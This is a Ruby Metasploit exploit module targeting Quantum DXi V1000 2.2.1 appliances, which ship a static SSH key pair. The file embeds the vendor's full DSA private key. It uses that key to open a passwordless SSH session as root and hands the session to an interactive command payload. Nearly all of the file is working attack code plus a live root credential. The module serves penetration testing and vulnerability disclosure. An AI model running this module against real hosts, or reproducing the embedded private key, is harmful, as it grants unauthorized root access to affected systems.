GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/linux/ssh/quantum_dxi_known_privkey.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'net/ssh'
require 'net/ssh/command_stream'
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::SSH

  # Declares module metadata and options.
  #
  # The SSH mixin does not pull in the Tcp mixin, so RHOST/RPORT are
  # registered here by hand and exposed through #rhost / #rport below.
  # The 'cmd_interact' / 'find' payload compatibility reflects that the
  # authenticated SSH channel itself becomes the session.
  def initialize(info = {})
    module_info = {
      'Name' => 'Quantum DXi V1000 SSH Private Key Exposure',
      'Description' => %q{
        Quantum ships a public/private key pair on DXi V1000 2.2.1 appliances that
        allows passwordless authentication to any other DXi box. Since the key is
        easily retrievable, an attacker can use it to gain unauthorized remote
        access as root.
      },
      'Platform' => 'unix',
      'Arch' => ARCH_CMD,
      'Privileged' => true,
      'Targets' => [ [ 'Universal', {} ] ],
      'Payload' => {
        'Compat' => {
          'PayloadType' => 'cmd_interact',
          'ConnectionType' => 'find'
        }
      },
      'Author' => 'xistence <xistence[at]0x90.nl>', # Discovery, Metasploit module
      'License' => MSF_LICENSE,
      'References' => [
        ['PACKETSTORM', '125755'],
        ['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH]
      ],
      'DisclosureDate' => '2014-03-17',
      'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
      'DefaultTarget' => 0,
      'Notes' => {
        'Stability' => [CRASH_SAFE],
        'Reliability' => [REPEATABLE_SESSION],
        'SideEffects' => []
      }
    }

    super(update_info(info, module_info))

    # Registered manually because the Tcp mixin (which normally provides
    # these) is not included.
    register_options(
      [
        Opt::RHOST(),
        Opt::RPORT(22)
      ], self.class
    )

    register_advanced_options(
      [
        OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
        OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
      ]
    )
  end

  # Target host; stands in for the accessor the Tcp mixin would provide.
  def rhost
    datastore['RHOST']
  end

  # Target port; stands in for the accessor the Tcp mixin would provide.
  def rport
    datastore['RPORT']
  end

  # Opens a public-key SSH session as +user+ with the embedded key.
  #
  # @param user [String] remote account to authenticate as
  # @return [Net::SSH::CommandStream, nil] an interactive command stream on
  #   success; nil when the connection, negotiation or authentication fails
  #   (each failure other than a plain connection error is reported via
  #   print_error)
  def do_login(user)
    # Only public-key auth is offered; SSH_DEBUG turns on net-ssh's
    # debug-level logging.
    ssh_options = ssh_client_defaults.merge(
      auth_methods: ['publickey'],
      port: rport,
      key_data: [key_data]
    )
    ssh_options[:verbose] = :debug if datastore['SSH_DEBUG']

    ssh_socket = nil
    begin
      # Bound the whole key exchange / auth exchange by SSH_TIMEOUT.
      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
        ssh_socket = Net::SSH.start(rhost, user, ssh_options)
      end
    rescue Rex::ConnectionError
      return nil
    rescue Net::SSH::Disconnect, ::EOFError
      print_error("#{rhost}:#{rport} SSH - Disconnected during negotiation")
      return nil
    rescue ::Timeout::Error
      print_error("#{rhost}:#{rport} SSH - Timed out during negotiation")
      return nil
    rescue Net::SSH::AuthenticationFailed
      print_error("#{rhost}:#{rport} SSH - Failed authentication")
      return nil
    rescue Net::SSH::Exception => err
      print_error("#{rhost}:#{rport} SSH Error: #{err.class} : #{err.message}")
      return nil
    end

    return nil unless ssh_socket

    # Wrap the authenticated connection so the framework can drive it as a
    # command stream.
    Net::SSH::CommandStream.new(ssh_socket, logger: self)
  end

  # Authenticates as root with the embedded key and, on success, hands the
  # stream's local socket to the payload handler.
  def exploit
    stream = do_login('root')
    return unless stream

    print_good("#{rhost}:#{rport} - Successful login")
    handler(stream.lsock)
  end

  # The vendor-shipped DSA private key (PEM) used for authentication.
  #
  # Defensive note: because this key is static and published, the
  # corresponding public key should be treated as a known-compromised
  # credential — remove it from trusted-key stores on affected appliances
  # and rotate, per vendor guidance (confirm against current advisories).
  def key_data
    <<~KEY
      -----BEGIN DSA PRIVATE KEY-----
      MIIBugIBAAKBgQCEgBNwgF+IbMU8NHUXNIMfJ0ONa91ZI/TphuixnilkZqcuwur2
      hMbrqY8Yne+n3eGkuepQlBBKEZSd8xPd6qCvWnCOhBqhkBS7g2dH6jMkUl/opX/t
      Rw6P00crq2oIMafR4/SzKWVW6RQEzJtPnfV7O3i5miY7jLKMDZTn/DRXRwIVALB2
      +o4CRHpCG6IBqlD/2JW5HRQBAoGAaSzKOHYUnlpAoX7+ufViz37cUa1/x0fGDA/4
      6mt0eD7FTNoOnUNdfdZx7oLXVe7mjHjqjif0EVnmDPlGME9GYMdi6r4FUozQ33Y5
      PmUWPMd0phMRYutpihaExkjgl33AH7mp42qBfrHqZ2oi1HfkqCUoRmB6KkdkFosr
      E0apJ5cCgYBLEgYmr9XCSqjENFDVQPFELYKT7Zs9J87PjPS1AP0qF1OoRGZ5mefK
      6X/6VivPAUWmmmev/BuAs8M1HtfGeGGzMzDIiU/WZQ3bScLB1Ykrcjk7TOFD6xrn
      k/inYAp5l29hjidoAONcXoHmUAMYOKqn63Q2AsDpExVcmfj99/BlpQIUYS6Hs70u
      B3Upsx556K/iZPPnJZE=
      -----END DSA PRIVATE KEY-----
    KEY
  end
end